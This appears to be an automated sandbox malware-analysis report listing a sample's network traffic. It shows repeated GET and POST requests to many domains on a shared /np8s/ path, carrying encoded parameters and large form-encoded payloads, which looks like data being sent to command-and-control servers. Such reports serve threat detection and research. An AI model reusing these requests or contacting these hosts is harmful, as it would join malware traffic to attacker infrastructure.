Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=upNApQGgxnIpkDsed4j6UePR+EOmKhNhiuHKrn3aPCq0+c3DSqp4vkB5DGytvWTvww8fhFgzIA==&aDHdzD=vpgdJ4mxrh HTTP/1.1 Host: www.waermark.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=0pptgqp0MeRyeb/9nmudohOLKq4u2ksDwR1w+rnfL4/we0tceqenlGY7vNOGaAQzxdf5zVwFvA==&aDHdzD=vpgdJ4mxrh HTTP/1.1 Host: www.getbusinesscreditandfunding.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=0pptgqp0MeRyeb/9nmudohOLKq4u2ksDwR1w+rnfL4/we0tceqenlGY7vNOGaAQzxdf5zVwFvA==&Eh=mhUxl HTTP/1.1 Host: www.getbusinesscreditandfunding.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=1Nsioc0lpQImfCEv7q3CJRvbkNIovvFEONaUY8zyneWF7ypKO8GgemnIz/Jz3qNJ0RZyolUFog==&Eh=mhUxl HTTP/1.1 Host: www.xn--wsthof-camping-gsb.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 198.54.117.217
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.siberup.xyzConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.siberup.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.siberup.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 54 42 6a 6c 49 4a 43 7a 76 72 46 6c 48 44 46 71 44 41 63 48 44 58 65 58 65 4c 38 31 73 66 78 51 69 68 4b 71 32 4a 6a 49 56 68 44 33 37 6d 66 41 70 79 41 35 66 72 6e 43 32 53 52 33 4e 6d 6b 68 35 38 6a 34 50 53 58 42 5a 71 6f 2d 6e 54 44 61 4b 51 64 4c 72 69 34 53 47 38 72 37 75 58 72 56 4d 57 50 66 6f 4f 64 2d 30 4a 5a 48 47 6c 62 58 51 39 33 67 7a 4e 43 32 41 63 59 6e 62 6f 4e 6c 6d 56 7e 4b 6a 49 7a 47 48 7a 59 4d 77 45 30 68 44 50 6d 7a 35 71 65 5f 6f 66 58 69 42 56 76 79 52 5f 65 6f 57 48 55 31 41 58 37 43 35 49 4a 36 73 53 61 38 77 48 46 6f 42 58 67 35 57 5f 44 53 6f 73 69 78 6f 57 31 38 5a 54 69 6e 6e 48 73 48 34 62 51 53 54 58 4c 38 55 42 4a 6e 67 65 56 55 68 38 43 56 76 45 7a 36 31 63 32 44 75 62 75 6e 36 4a 44 72 65 63 43 4a 67 64 49 4b 57 61 63 53 72 51 6c 34 67 6d 41 61 36 46 76 6a 47 4b 71 62 6f 30 76 62 58 57 56 55 74 66 69 64 6c 37 76 62 41 38 4e 6b 4a 34 44 57 5a 4b 48 59 39 62 59 46 4c 41 57 4c 33 70 73 50 63 51 62 75 46 4c 4f 42 67 65 67 50 58 51 70 52 34 6b 36 6d 31 6e 49 59 44 58 6b 50 68 4c 6a 4a 58 45 59 45 33 2d 74 4c 48 6d 42 79 57 31 28 63 5a 31 6a 74 69 71 31 6b 4e 56 41 71 77 48 36 76 6a 35 7a 64 78 67 46 49 6c 4f 49 70 5a 46 32 41 73 36 34 70 30 58 37 32 6e 36 42 64 7e 47 45 2e 00 00 00 00 00 00 00 00 Data Ascii: 
3fk4oN=TBjlIJCzvrFlHDFqDAcHDXeXeL81sfxQihKq2JjIVhD37mfApyA5frnC2SR3Nmkh58j4PSXBZqo-nTDaKQdLri4SG8r7uXrVMWPfoOd-0JZHGlbXQ93gzNC2AcYnboNlmV~KjIzGHzYMwE0hDPmz5qe_ofXiBVvyR_eoWHU1AX7C5IJ6sSa8wHFoBXg5W_DSosixoW18ZTinnHsH4bQSTXL8UBJngeVUh8CVvEz61c2Dubun6JDrecCJgdIKWacSrQl4gmAa6FvjGKqbo0vbXWVUtfidl7vbA8NkJ4DWZKHY9bYFLAWL3psPcQbuFLOBgegPXQpR4k6m1nIYDXkPhLjJXEYE3-tLHmByW1(cZ1jtiq1kNVAqwH6vj5zdxgFIlOIpZF2As64p0X72n6Bd~GE.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.siberup.xyzConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.siberup.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.siberup.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 54 42 6a 6c 49 49 7e 70 69 34 42 4f 4e 7a 35 5a 45 7a 73 54 58 30 47 56 62 34 51 36 77 4b 34 49 6f 77 61 59 72 5a 79 70 62 45 47 6d 78 32 43 69 34 68 78 6d 66 75 43 55 75 51 31 7a 61 57 6f 69 35 38 71 70 50 53 62 42 61 72 77 51 67 79 53 39 4b 79 6c 45 6f 43 34 69 4a 63 71 6c 34 6a 69 48 4d 57 4b 49 6f 4f 55 6d 33 38 46 48 55 32 7a 58 62 61 6a 72 39 4e 44 39 4e 38 49 37 57 4a 78 53 6d 56 6e 50 6a 4b 33 47 47 44 45 4d 78 6b 45 6d 42 49 4b 30 6a 4b 66 33 74 66 58 37 54 56 72 6d 52 5f 61 57 57 47 34 31 41 6b 50 43 35 63 46 36 35 52 43 5f 6f 6e 46 70 51 6e 67 34 53 5f 4f 63 6f 73 7e 39 6f 55 59 48 61 68 7e 6e 39 58 73 47 72 5a 77 61 58 41 28 76 59 68 4d 31 67 66 6f 49 68 70 6a 47 76 46 4f 66 7a 75 65 34 72 34 58 49 36 4c 75 6c 62 38 43 46 34 4e 49 72 57 61 63 55 72 51 6c 6e 67 6d 51 61 36 47 50 6a 48 72 61 62 75 45 76 61 59 57 56 56 31 76 6a 46 76 62 71 6b 41 38 46 65 4a 35 61 7a 65 34 33 59 38 4a 51 46 4b 6a 4f 4d 35 5a 73 4a 5a 51 61 37 50 72 4f 65 67 65 67 58 58 56 56 37 34 54 53 6d 30 79 38 59 46 78 59 50 6b 37 6a 4a 4a 30 59 47 74 4f 52 62 48 6d 4a 32 57 78 37 6d 5a 43 62 74 6a 37 56 6b 4a 45 41 71 30 33 36 76 36 70 7a 4f 68 43 67 46 39 74 70 69 61 57 7e 4e 30 37 67 32 73 46 32 6d 28 34 39 5a 74 43 32 51 64 79 68 42 66 4a 39 38 44 61 77 6f 67 47 4f 79 6f 42 67 69 72 62 4a 41 79 63 4d 55 6f 78 47 76 6b 69 61 54 4f 4d 30 55 35 4e 68 52 69 68 69 41 72 6b 54 48 32 41 7a 71 4c 36 6d 6b 66 43 66 35 58 47 35 48 4c 79 75 4d 44 54 68 6c 6d 50 39 63 4f 51 76 6e 55 57 28 6d 65 4e 30 62 32 56 72 4a 76 5f 6e 44 4a 75 5a 74 34 64 69 52 48 49 70 
56 53 73 6d 56 70 5f 33 53 78 2d 62 46 39 35 45 55 74 6c 76 4d 6b 68 41 5f 5a 47 77 4a 57 68 53 56 62 73 43 54 52 61 7a 6c 4d 39 51 46 68 38 54 66 4d 30 50 43 41 47 42 51 62 4c 70 75 69 4c 31 47 45 4d 49 6b 67 4a 67 77 61 68 7e 62 6d 75 38 57 68 5a 42 62 45 57 4a 6d 75 57 6b 51 5a 4c 6b 77 79 72 59 64 34 55 48 43 6e 65 7a 64 35 55 4f 35 68 6f 4e 66 6a 46 44 71 65 54 52 4e 74 43 62 70 77 67 78 6c 44 6c 70 79 34 57 64 2d 30 32 53 53 64 4b 37 35 75 64 70 4a 5a 43 7a 49 52 76 4f 71 4d 72 78 71 31 32 70 74 32 53 48 75 46 75 54 57 57 65 7a 33 4a 37 68 67 32 4c 5a 36 6c 74 56 75 38 79 35 4b 6b 79 72 59 73 31 68 56 38 74 41 54 59 6d 35 58 71 4f 54 61 68 74 61 4e 4c 61 70 36 71 4f 4d 37 6d 75 4a 34 6e 63 6c 50 4a 71 5a 75 6c 76 76 5f 28 6b 46 42 6a 31 7e 69 38 64 63 6b 55 6e 69 2d 56 5f 4f 74 73 55 46 66 61 46 5a 61 49 51 37 34 4f 30 70 6b 4d 77 49 4e 63 37 71 52 7a 67 76 53 77 56 68 6e 76 6f 4a 69 68 64 53 64 79 5a 74 75 70 38 67 2d 75 38 45 4d 53 4f 63 4d 5a 41 31 32 65 61 54 63 32 45 59 4d 52 30 59 58 39 37 38 58
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.harmlett.comConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.harmlett.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.harmlett.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 49 64 53 47 7a 46 72 78 34 73 63 44 6b 31 73 59 6a 6b 28 59 69 47 49 42 77 4a 32 43 77 6a 78 49 61 65 51 73 58 45 31 56 79 30 76 34 58 73 4f 55 35 46 55 55 36 4e 6b 75 35 57 4c 78 38 4d 39 67 62 62 42 58 54 2d 7e 32 67 47 58 35 69 42 48 55 41 68 52 55 75 6f 43 52 47 54 52 6d 6c 32 38 46 61 4c 6b 64 67 6c 32 41 6e 4e 57 31 49 64 35 65 6d 53 51 4f 34 5a 6b 6d 4a 74 50 56 38 71 52 62 6f 6f 36 4b 45 62 38 32 76 58 38 52 43 4a 37 6e 5a 39 64 72 64 6a 52 38 54 47 74 4a 4b 73 57 30 34 62 4c 7a 30 78 61 56 4e 45 6a 5a 37 36 56 51 62 5f 71 6a 51 69 32 31 35 7a 54 66 28 35 5a 77 56 4b 4e 44 79 69 62 7a 4e 4b 54 63 44 33 58 6f 35 6a 46 58 34 74 65 41 7a 31 54 6b 37 7a 64 56 30 74 6c 4b 71 38 71 52 58 32 69 72 28 65 79 76 38 45 50 49 4f 42 42 63 41 4e 54 65 43 52 73 63 66 66 55 66 64 5f 37 49 78 76 75 54 56 30 72 34 64 57 7a 78 4d 50 75 68 55 6f 36 44 67 4f 53 61 77 38 78 7a 64 5f 71 41 67 6c 38 77 5a 48 43 67 41 50 38 62 6d 72 65 5a 48 70 5a 72 76 72 6f 73 71 52 58 50 7e 49 52 57 63 56 73 54 42 36 4d 79 6d 33 61 58 64 78 45 50 5a 61 76 59 73 5a 31 61 74 64 32 64 6b 35 55 6e 39 36 49 72 69 54 74 35 5a 51 30 64 67 65 48 54 38 37 7e 5f 55 44 67 45 4a 36 43 73 75 6a 74 2d 70 42 35 57 44 7a 58 56 41 4e 6b 64 4e 51 38 2e 00 00 00 00 00 00 00 00 Data Ascii: 
3fk4oN=IdSGzFrx4scDk1sYjk(YiGIBwJ2CwjxIaeQsXE1Vy0v4XsOU5FUU6Nku5WLx8M9gbbBXT-~2gGX5iBHUAhRUuoCRGTRml28FaLkdgl2AnNW1Id5emSQO4ZkmJtPV8qRboo6KEb82vX8RCJ7nZ9drdjR8TGtJKsW04bLz0xaVNEjZ76VQb_qjQi215zTf(5ZwVKNDyibzNKTcD3Xo5jFX4teAz1Tk7zdV0tlKq8qRX2ir(eyv8EPIOBBcANTeCRscffUfd_7IxvuTV0r4dWzxMPuhUo6DgOSaw8xzd_qAgl8wZHCgAP8bmreZHpZrvrosqRXP~IRWcVsTB6Mym3aXdxEPZavYsZ1atd2dk5Un96IriTt5ZQ0dgeHT87~_UDgEJ6Csujt-pB5WDzXVANkdNQ8.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.harmlett.comConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.harmlett.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.harmlett.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 49 64 53 47 7a 46 6e 5a 31 34 74 56 71 46 68 32 69 78 7a 4d 74 53 4d 50 33 35 79 47 28 43 77 51 4e 50 42 58 61 68 4a 42 7a 77 72 2d 54 66 37 62 39 45 63 4d 36 50 38 44 30 46 75 35 35 73 78 68 62 62 49 45 54 5f 4b 32 68 46 57 6d 69 6a 28 79 41 44 35 58 71 49 44 6f 55 44 52 5f 76 69 38 6f 61 4b 51 72 67 6c 7e 51 6d 39 36 31 4a 2d 42 65 76 31 38 48 6e 70 6b 38 53 74 66 4a 79 4b 73 4c 6f 6f 7a 50 45 5a 34 32 75 6e 77 52 54 63 7a 6d 62 36 68 73 55 54 52 35 57 47 73 4a 41 4d 4b 6e 34 62 4f 6d 30 7a 65 56 4f 32 48 5a 34 4f 5a 51 4f 2d 71 67 45 43 32 77 6f 6a 53 64 37 34 6c 68 56 4c 6c 78 79 6a 66 5a 4e 5a 7a 63 44 48 58 70 38 77 6c 31 70 75 48 41 67 6c 4f 30 37 7a 52 38 7a 38 35 43 71 39 48 30 66 67 6e 66 36 38 61 46 38 48 69 64 43 42 41 56 49 74 53 61 43 52 73 57 66 66 55 31 64 5f 4c 49 78 73 7e 54 58 57 7a 34 62 6d 7a 79 44 50 76 72 66 49 36 41 33 2d 65 71 77 39 56 6a 64 2d 7e 71 68 58 4d 77 4c 69 65 67 52 2d 38 55 73 62 65 6c 4c 4a 5a 50 72 72 6f 6a 71 52 57 73 7e 4d 46 47 62 6b 38 54 41 76 67 79 71 31 43 58 62 42 45 50 63 61 76 57 69 35 35 77 74 64 76 56 6b 38 78 61 36 4d 45 72 69 41 6c 35 59 78 30 64 67 75 48 54 36 37 28 53 43 44 41 4a 53 70 62 72 6c 53 74 6d 31 44 42 65 44 54 53 63 55 65 67 35 54 33 35 2d 4e 4a 48 51 41 7a 39 58 68 32 53 43 4f 68 59 73 45 48 6d 5f 71 4a 6b 59 7e 38 43 57 79 66 31 48 42 61 5a 30 4c 61 4e 45 66 55 32 4f 28 44 28 74 54 47 34 34 63 68 7a 35 68 74 33 51 7a 51 61 6f 6a 36 62 59 74 4c 52 66 66 31 77 2d 39 44 6f 50 58 49 7a 73 53 5a 4d 78 70 63 33 58 43 4e 75 44 49 30 50 49 51 4b 68 43 49 33 63 5a 4e 43 
7a 62 72 31 51 77 79 47 6e 31 57 61 4d 78 75 5f 69 59 55 4f 59 50 73 53 74 4c 72 30 4d 77 7e 38 28 41 4b 71 46 67 71 48 4a 4e 52 73 46 6a 54 39 5a 46 31 38 4d 33 30 67 39 2d 39 4b 69 79 65 6c 6b 54 7e 66 65 74 76 63 61 75 7a 53 6d 4c 43 55 57 41 37 6f 72 44 63 41 7e 43 6d 4f 4d 49 6d 38 35 63 7a 30 61 37 33 53 47 50 58 5f 48 66 39 46 6f 63 50 2d 59 6b 72 61 28 71 35 77 4c 59 78 54 6f 78 70 6e 75 45 4e 76 48 72 42 58 4d 62 4e 73 56 67 57 6e 7a 35 4a 63 53 65 38 45 47 6c 38 4f 31 39 6b 6e 49 35 72 54 34 66 37 39 56 6e 72 69 31 55 4b 5a 33 52 41 64 4c 5a 4c 5a 63 2d 7a 6f 73 56 6c 47 6b 53 53 54 34 47 61 37 46 59 6d 59 52 59 42 73 53 6d 49 42 63 53 72 71 46 53 78 4c 4b 5a 63 63 28 34 6f 38 33 6e 70 56 50 6d 76 54 43 4e 47 6d 69 56 64 39 38 68 75 4a 36 52 4a 74 37 4e 46 31 46 70 4a 48 71 73 41 63 71 73 39 41 44 6f 4a 31 61 52 49 79 53 33 56 42 58 43 64 6e 67 7a 35 43 56 61 4a 63 4c 55 77 4a 68 6c 57 63 38 38 56 53 41 39 34 75 33 78 75 79 50 67 64 52 46 69 73 42 63 6f 59 44 79 79 67 79 49 53 43 36 59 34 70 77 69
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.brandpay.xyzConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.brandpay.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.brandpay.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 75 69 30 6d 56 38 72 6a 53 34 52 34 67 33 36 53 48 4a 55 72 31 71 39 55 78 4e 73 4a 65 61 6a 30 68 6f 58 49 76 39 48 79 54 46 62 4a 31 44 53 4b 6d 79 38 56 56 63 75 55 78 62 4e 57 7e 67 4c 48 64 78 54 30 28 72 48 34 4e 58 35 56 6c 58 62 5a 42 69 74 34 37 2d 76 6e 44 45 41 57 43 77 50 4b 44 4f 28 67 74 65 48 71 37 56 6f 79 6a 4d 35 45 70 38 68 6f 33 33 7a 62 62 76 45 61 45 2d 42 70 45 36 69 39 48 2d 42 44 6b 74 6e 5f 4c 66 46 68 70 76 31 77 4c 73 62 6a 43 61 43 51 4c 5a 4e 4f 43 64 5a 6c 63 44 71 52 55 41 43 43 58 6a 4e 41 52 7a 63 64 35 54 6e 39 4e 37 4c 41 5a 44 63 39 62 47 34 6b 6b 43 4d 74 4c 76 35 61 67 70 4f 79 42 77 39 45 72 43 68 58 33 46 75 61 54 41 36 52 33 45 37 4b 50 41 57 68 54 37 31 6e 6b 4c 4c 69 6f 35 48 54 49 64 78 2d 4c 63 76 39 48 30 53 6f 74 31 39 4c 4f 61 62 32 48 77 49 51 33 74 37 36 44 6f 77 64 43 58 42 58 47 76 33 49 59 30 36 76 38 77 4b 39 72 6e 32 76 66 41 71 7a 57 71 75 67 6a 6b 63 4e 32 5a 50 74 45 67 54 4f 53 56 37 34 6f 2d 64 4a 49 43 33 61 5a 74 4f 76 6d 64 52 37 53 6e 50 62 52 36 4d 5f 7e 44 56 73 32 43 74 59 52 52 31 4c 52 36 44 61 75 68 4e 36 71 56 56 31 31 31 52 38 61 33 47 46 49 4d 28 78 79 72 6f 77 79 54 68 4c 28 61 79 65 70 4f 61 74 37 30 64 6a 65 70 38 4f 48 77 51 2e 00 00 00 00 00 00 00 00 Data Ascii: 
3fk4oN=ui0mV8rjS4R4g36SHJUr1q9UxNsJeaj0hoXIv9HyTFbJ1DSKmy8VVcuUxbNW~gLHdxT0(rH4NX5VlXbZBit47-vnDEAWCwPKDO(gteHq7VoyjM5Ep8ho33zbbvEaE-BpE6i9H-BDktn_LfFhpv1wLsbjCaCQLZNOCdZlcDqRUACCXjNARzcd5Tn9N7LAZDc9bG4kkCMtLv5agpOyBw9ErChX3FuaTA6R3E7KPAWhT71nkLLio5HTIdx-Lcv9H0Sot19LOab2HwIQ3t76DowdCXBXGv3IY06v8wK9rn2vfAqzWqugjkcN2ZPtEgTOSV74o-dJIC3aZtOvmdR7SnPbR6M_~DVs2CtYRR1LR6DauhN6qVV111R8a3GFIM(xyrowyThL(ayepOat70djep8OHwQ.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.brandpay.xyzConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.brandpay.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.brandpay.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 75 69 30 6d 56 34 71 36 63 6f 39 62 71 48 48 79 4b 61 6c 79 39 2d 42 53 39 64 6f 61 43 75 79 30 6d 63 61 78 73 49 37 68 43 30 6a 54 7e 54 4f 6e 69 7a 6b 7a 56 5a 53 74 38 4a 70 61 35 46 54 45 64 78 4c 57 28 71 48 34 4d 55 35 46 69 78 4b 32 42 41 31 37 34 65 76 62 43 45 41 31 56 69 37 6a 44 4f 37 43 74 65 50 36 34 6d 38 79 6a 76 42 45 67 62 4e 33 6f 48 7a 42 53 4c 6f 38 4a 65 4e 30 45 36 4b 6c 48 38 56 44 6c 64 72 5f 4c 38 64 2d 38 38 74 33 43 63 62 36 48 61 44 4f 46 4a 52 43 43 64 73 41 63 42 4f 52 58 32 36 43 57 79 74 41 55 45 4a 4c 78 44 6e 34 48 62 4c 47 49 7a 51 73 62 47 4d 57 6b 48 31 53 4d 64 6c 61 68 5a 4f 7a 46 6d 39 39 36 42 49 56 31 45 61 39 54 41 47 38 33 56 57 4e 50 42 4b 4e 54 49 63 52 72 4e 66 59 6f 37 71 4f 4f 39 78 36 4d 73 76 6d 48 30 54 41 74 31 38 6f 4f 61 72 32 48 33 73 51 6c 63 4c 36 47 59 77 61 66 48 42 59 4d 50 33 58 63 30 33 65 38 77 69 74 72 6a 69 42 59 32 7e 7a 55 2d 47 67 32 56 63 4d 6a 35 50 76 5a 51 54 69 66 31 37 37 6f 2d 63 65 49 48 62 30 59 63 53 76 6e 49 39 37 65 6c 58 62 43 36 4d 5f 37 44 56 75 39 69 68 49 52 51 52 50 52 37 7a 6b 75 53 68 36 6b 6b 31 31 31 57 4a 38 63 48 47 46 41 73 7e 7a 39 62 56 4b 32 69 34 74 38 72 71 50 31 64 43 4f 34 6a 31 70 45 59 63 4b 66 57 32 31 78 6f 72 7a 51 6a 52 2d 6a 7a 47 35 52 38 6e 78 73 74 77 4d 4a 5a 59 55 54 4a 4c 77 67 48 56 4f 64 4b 52 42 4e 52 66 48 78 74 6e 4e 69 7a 36 66 4c 44 63 54 35 74 41 36 39 42 77 58 39 46 4d 4c 31 43 52 33 43 64 6b 51 7a 6f 75 58 74 57 63 67 78 44 49 4b 4c 6e 4c 4e 42 55 6a 42 58 32 65 78 76 73 78 62 56 62 64 57 70 78 42 77 6f 59 
43 53 54 44 7e 35 31 59 53 2d 50 6d 61 53 64 6f 49 46 67 54 37 47 4d 56 6a 46 68 59 67 69 43 68 59 72 5a 50 70 4f 4f 6d 53 33 4e 31 39 64 42 33 6f 69 6c 50 4e 32 43 47 39 47 6d 4b 31 48 68 35 61 41 6b 32 63 6c 6b 52 5a 74 6c 6b 67 41 64 31 37 4a 35 79 42 5a 39 4e 5a 71 68 42 39 65 48 42 77 6f 67 36 7a 51 44 70 33 38 6f 45 33 59 44 6e 77 37 6f 74 42 4c 4e 6d 58 31 4c 4a 71 61 33 73 6e 33 6b 4a 62 41 69 51 76 6a 46 68 39 5f 6e 4b 67 4b 51 76 6d 2d 62 72 34 6c 65 61 30 62 70 67 33 6b 68 55 53 5f 41 63 4e 4f 45 50 56 7a 28 59 33 68 51 37 42 61 65 75 35 76 76 51 44 4a 70 73 6d 2d 58 6e 6f 7a 44 57 77 42 79 6c 38 34 43 47 4e 43 66 32 66 63 36 56 30 46 65 71 77 6e 38 39 46 4a 32 53 37 73 65 58 68 7a 4c 72 75 51 37 78 56 77 32 5a 36 4d 73 73 54 57 4c 5a 47 74 49 37 4f 78 39 66 35 37 33 4e 73 68 4e 61 37 55 49 52 7a 42 68 6c 48 57 4a 4c 45 56 6e 31 43 5f 44 6e 59 55 6f 6a 7a 37 4e 36 39 52 72 6f 4a 79 28 35 33 54 79 50 37 70 48 42 32 4c 30 38 28 48 4a 75 75 67 31 46 48 79 6f 61 41 4b 4a 4f 28 62 41 53 6c 79 75 37 43
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.tentanguang.onlineConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.tentanguang.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tentanguang.online/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 67 36 61 46 43 2d 36 55 39 4f 50 78 75 46 34 67 72 44 28 65 66 75 51 48 38 66 31 43 73 45 43 65 72 46 77 4c 75 49 49 2d 50 59 55 73 45 64 77 68 79 53 62 4e 56 70 38 4f 72 66 6f 69 47 4c 4c 43 34 79 66 69 50 49 78 5a 76 65 35 6f 4d 64 73 44 38 5f 51 69 62 2d 45 54 79 6c 30 62 5a 70 48 47 78 48 41 2d 71 37 55 66 43 67 6c 46 28 36 72 4a 6b 37 70 4d 78 4b 45 64 53 74 6f 37 6a 33 57 5a 51 2d 6a 62 73 71 68 4a 72 39 68 79 48 66 63 55 4b 69 30 72 6b 73 49 34 4a 70 5a 4f 7a 64 6b 6f 50 66 66 48 62 55 38 34 67 6d 38 35 62 78 55 42 55 35 47 55 69 68 54 42 36 66 4b 6c 58 55 36 4a 46 77 67 79 44 44 76 61 35 6d 66 54 74 7a 4d 76 70 5f 79 56 67 59 44 4b 53 53 65 47 44 6f 34 74 35 71 52 64 43 38 6d 37 4d 39 42 48 53 32 78 2d 5a 53 71 43 66 50 33 34 38 56 4f 61 65 33 71 32 66 41 6d 6d 78 57 68 49 6d 44 78 32 4a 61 6b 44 6f 48 63 6f 6e 66 41 62 32 37 44 30 54 44 42 44 78 64 71 72 65 4d 52 57 28 6f 65 4e 62 68 6f 6c 36 30 74 6c 33 72 45 71 42 6e 50 33 5a 6f 6a 2d 6a 6d 65 64 30 4e 50 70 58 71 44 62 6d 62 31 34 4d 79 59 70 45 4d 6b 4f 41 6f 35 4d 55 78 30 77 77 5f 77 72 78 6d 66 73 28 33 6a 59 71 36 70 46 7a 66 57 6a 32 41 4f 5a 72 51 32 44 72 4c 78 52 59 4c 4e 64 71 4b 53 62 42 47 6e 2d 58 53 71 4f 67 57 52 50 33 4d 30 2e 00 00 00 00 00 00 00 00 Data Ascii: 
3fk4oN=g6aFC-6U9OPxuF4grD(efuQH8f1CsECerFwLuII-PYUsEdwhySbNVp8OrfoiGLLC4yfiPIxZve5oMdsD8_Qib-ETyl0bZpHGxHA-q7UfCglF(6rJk7pMxKEdSto7j3WZQ-jbsqhJr9hyHfcUKi0rksI4JpZOzdkoPffHbU84gm85bxUBU5GUihTB6fKlXU6JFwgyDDva5mfTtzMvp_yVgYDKSSeGDo4t5qRdC8m7M9BHS2x-ZSqCfP348VOae3q2fAmmxWhImDx2JakDoHconfAb27D0TDBDxdqreMRW(oeNbhol60tl3rEqBnP3Zoj-jmed0NPpXqDbmb14MyYpEMkOAo5MUx0ww_wrxmfs(3jYq6pFzfWj2AOZrQ2DrLxRYLNdqKSbBGn-XSqOgWRP3M0.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.tentanguang.onlineConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.tentanguang.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tentanguang.online/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 67 36 61 46 43 37 62 52 35 36 33 6f 74 56 30 44 71 47 7a 43 51 2d 41 46 37 76 78 42 77 77 54 45 75 77 41 35 7a 59 34 70 4f 62 4a 39 41 73 63 4d 32 52 71 4f 56 6f 67 72 6a 4b 41 6d 4d 36 33 44 34 30 33 4d 50 4a 46 5a 6f 75 52 65 4d 5f 55 70 38 5a 73 6c 63 65 46 6d 67 31 31 62 64 73 6d 6b 78 48 56 62 71 37 63 31 43 77 78 46 38 63 6e 4a 6d 38 63 41 75 61 45 45 66 4e 34 5f 7e 6e 53 2d 51 2d 36 63 73 76 42 4a 72 4e 74 79 45 2d 73 58 4d 68 4d 6b 28 73 4a 54 4d 70 59 51 6f 4e 5a 52 50 65 50 68 62 56 41 34 6a 56 59 35 62 68 30 42 64 75 36 58 74 78 54 5a 73 76 4b 69 47 6b 7e 69 46 77 74 7a 44 42 44 67 34 55 44 54 73 44 4d 79 6c 4e 54 71 33 37 72 37 51 54 72 5f 44 6f 38 55 35 37 4d 59 43 39 6d 58 4f 4f 49 78 64 30 5a 51 5a 58 61 6b 64 76 32 7a 30 31 50 47 65 33 71 53 66 41 6e 73 78 56 4a 49 6d 45 4e 32 62 6f 38 44 28 48 63 76 6f 66 41 65 39 62 43 71 46 7a 46 6e 78 65 61 52 65 4e 6f 7a 28 61 65 4e 62 7a 51 6c 28 57 56 69 35 62 45 73 45 6e 50 74 54 49 6a 78 6a 6d 66 34 30 50 6e 35 51 64 4c 62 38 71 31 34 4d 51 77 70 43 38 6b 4f 5a 6f 35 43 66 52 34 67 77 37 6b 33 78 6a 37 61 38 45 50 59 71 73 39 46 7a 2d 57 6a 6d 41 4f 5a 7e 41 33 50 76 62 38 34 63 35 4d 68 76 4c 47 6a 59 57 72 6a 58 31 66 33 7a 6c 6b 56 6c 37 44 7a 30 78 68 36 55 38 31 69 73 46 69 74 6a 5a 77 6b 46 39 64 6c 75 75 78 72 31 6f 51 51 36 56 52 68 48 53 7a 30 42 68 72 43 35 74 7a 46 28 49 65 50 65 4d 56 5a 44 31 66 6f 70 6c 74 57 48 71 76 43 34 73 32 57 57 6e 46 76 69 68 34 71 54 4e 64 76 7a 38 56 35 32 48 6d 42 30 75 47 35 55 79 35 50 55 6a 6b 6b 52 39 7e 65 
